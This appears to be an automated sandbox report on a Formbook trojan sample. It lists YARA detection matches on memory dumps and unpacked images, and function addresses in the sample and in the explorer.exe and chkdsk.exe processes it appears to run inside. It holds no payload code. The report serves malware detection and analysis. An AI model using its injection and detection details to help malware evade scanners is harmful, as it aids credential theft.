Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 881SP1exr1.exe PID: 7264, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: 881SP1exr1.exe PID: 7420, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: chkdsk.exe PID: 7464, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.881SP1exr1.exe.2f52da4.1.raw.unpack, .cs	Large array initialization: : array initializer size 7534
Source: 0.2.881SP1exr1.exe.2f25094.2.raw.unpack, .cs	Large array initialization: : array initializer size 7534
Source: 0.2.881SP1exr1.exe.5930000.13.raw.unpack, .cs	Large array initialization: : array initializer size 7534

Source: 881SP1exr1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 881SP1exr1.exe PID: 7264, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: 881SP1exr1.exe PID: 7420, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: chkdsk.exe PID: 7464, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 0_2_015ED55C	0_2_015ED55C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 0_2_078D18E8	0_2_078D18E8
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 0_2_078D18D9	0_2_078D18D9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041E006	2_2_0041E006
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041D563	2_2_0041D563
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_00409E50	2_2_00409E50
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041DE6A	2_2_0041DE6A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A8158	2_2_014A8158
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01410100	2_2_01410100
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BA118	2_2_014BA118
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D81CC	2_2_014D81CC
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E01AA	2_2_014E01AA
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D41A2	2_2_014D41A2
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B2000	2_2_014B2000
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DA352	2_2_014DA352
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E03E6	2_2_014E03E6
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142E3F0	2_2_0142E3F0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A02C0	2_2_014A02C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420535	2_2_01420535
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E0591	2_2_014E0591
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D2446	2_2_014D2446
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C4420	2_2_014C4420
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014CE4F6	2_2_014CE4F6
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01444750	2_2_01444750
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141C7C0	2_2_0141C7C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143C6E0	2_2_0143C6E0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01436962	2_2_01436962
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014EA9A6	2_2_014EA9A6
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01422840	2_2_01422840
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142A840	2_2_0142A840
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E8F0	2_2_0144E8F0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014068B8	2_2_014068B8
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DAB40	2_2_014DAB40
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D6BD7	2_2_014D6BD7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141EA80	2_2_0141EA80
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142AD00	2_2_0142AD00
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BCD1F	2_2_014BCD1F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141ADE0	2_2_0141ADE0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01438DBF	2_2_01438DBF
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420C00	2_2_01420C00
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01410CF2	2_2_01410CF2
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0CB5	2_2_014C0CB5
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01494F40	2_2_01494F40
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01462F28	2_2_01462F28
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01440F30	2_2_01440F30
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C2F30	2_2_014C2F30
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01412FC8	2_2_01412FC8
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149EFA0	2_2_0149EFA0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420E59	2_2_01420E59
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DEE26	2_2_014DEE26
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DEEDB	2_2_014DEEDB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01432E90	2_2_01432E90
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DCE93	2_2_014DCE93
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014EB16B	2_2_014EB16B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0145516C	2_2_0145516C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140F172	2_2_0140F172
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142B1B0	2_2_0142B1B0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014CF0CC	2_2_014CF0CC
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014270C0	2_2_014270C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D70E9	2_2_014D70E9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DF0E0	2_2_014DF0E0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140D34C	2_2_0140D34C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D132D	2_2_014D132D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0146739A	2_2_0146739A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143B2C0	2_2_0143B2C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C12ED	2_2_014C12ED
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143D2F0	2_2_0143D2F0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014252A0	2_2_014252A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D7571	2_2_014D7571
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E95C3	2_2_014E95C3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BD5B0	2_2_014BD5B0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01411460	2_2_01411460
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DF43F	2_2_014DF43F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DF7B0	2_2_014DF7B0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01465630	2_2_01465630
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D16CC	2_2_014D16CC
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01429950	2_2_01429950
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143B950	2_2_0143B950
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B5910	2_2_014B5910
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148D800	2_2_0148D800
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014238E0	2_2_014238E0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DFB76	2_2_014DFB76
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01495BF0	2_2_01495BF0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0145DBF9	2_2_0145DBF9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143FB80	2_2_0143FB80
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DFA49	2_2_014DFA49
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D7A46	2_2_014D7A46
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01493A6C	2_2_01493A6C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014CDAC6	2_2_014CDAC6
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01465AA0	2_2_01465AA0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BDAAC	2_2_014BDAAC
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C1AA3	2_2_014C1AA3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01423D40	2_2_01423D40
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D1D5A	2_2_014D1D5A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D7D73	2_2_014D7D73
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143FDC0	2_2_0143FDC0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01499C32	2_2_01499C32
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DFCF2	2_2_014DFCF2
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DFF09	2_2_014DFF09
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01421F92	2_2_01421F92
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_013E3FD5	2_2_013E3FD5
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_013E3FD2	2_2_013E3FD2
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DFFB1	2_2_014DFFB1
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01429EB0	2_2_01429EB0
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5D8232	3_2_0E5D8232
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5D7036	3_2_0E5D7036
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5CE082	3_2_0E5CE082
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5D5912	3_2_0E5D5912
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5CFD02	3_2_0E5CFD02
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5D2B30	3_2_0E5D2B30
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5D2B32	3_2_0E5D2B32
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5DB5CD	3_2_0E5DB5CD
Source: C:\Windows\explorer.exe	Code function: 3_2_0F43BB32	3_2_0F43BB32
Source: C:\Windows\explorer.exe	Code function: 3_2_0F43BB30	3_2_0F43BB30
Source: C:\Windows\explorer.exe	Code function: 3_2_0F441232	3_2_0F441232
Source: C:\Windows\explorer.exe	Code function: 3_2_0F438D02	3_2_0F438D02
Source: C:\Windows\explorer.exe	Code function: 3_2_0F43E912	3_2_0F43E912
Source: C:\Windows\explorer.exe	Code function: 3_2_0F4445CD	3_2_0F4445CD
Source: C:\Windows\explorer.exe	Code function: 3_2_0F440036	3_2_0F440036
Source: C:\Windows\explorer.exe	Code function: 3_2_0F437082	3_2_0F437082
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D0591	4_2_059D0591
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05910535	4_2_05910535
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059BE4F6	4_2_059BE4F6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059B4420	4_2_059B4420
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C2446	4_2_059C2446
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0590C7C0	4_2_0590C7C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05934750	4_2_05934750
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05910770	4_2_05910770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0592C6E0	4_2_0592C6E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D01AA	4_2_059D01AA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C41A2	4_2_059C41A2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C81CC	4_2_059C81CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059AA118	4_2_059AA118
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05900100	4_2_05900100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05998158	4_2_05998158
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059A2000	4_2_059A2000
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0591E3F0	4_2_0591E3F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D03E6	4_2_059D03E6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CA352	4_2_059CA352
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059902C0	4_2_059902C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059B0274	4_2_059B0274
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05928DBF	4_2_05928DBF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0590ADE0	4_2_0590ADE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059ACD1F	4_2_059ACD1F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0591AD00	4_2_0591AD00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059B0CB5	4_2_059B0CB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05900CF2	4_2_05900CF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05910C00	4_2_05910C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0598EFA0	4_2_0598EFA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05902FC8	4_2_05902FC8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05930F30	4_2_05930F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059B2F30	4_2_059B2F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952F28	4_2_05952F28
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05984F40	4_2_05984F40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05922E90	4_2_05922E90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CCE93	4_2_059CCE93
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CEEDB	4_2_059CEEDB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CEE26	4_2_059CEE26
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05910E59	4_2_05910E59
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059129A0	4_2_059129A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DA9A6	4_2_059DA9A6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05926962	4_2_05926962
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_058F68B8	4_2_058F68B8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0593E8F0	4_2_0593E8F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0591A840	4_2_0591A840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05912840	4_2_05912840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C6BD7	4_2_059C6BD7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CAB40	4_2_059CAB40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0590EA80	4_2_0590EA80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059AD5B0	4_2_059AD5B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D95C3	4_2_059D95C3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C7571	4_2_059C7571
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CF43F	4_2_059CF43F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05901460	4_2_05901460
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CF7B0	4_2_059CF7B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C16CC	4_2_059C16CC
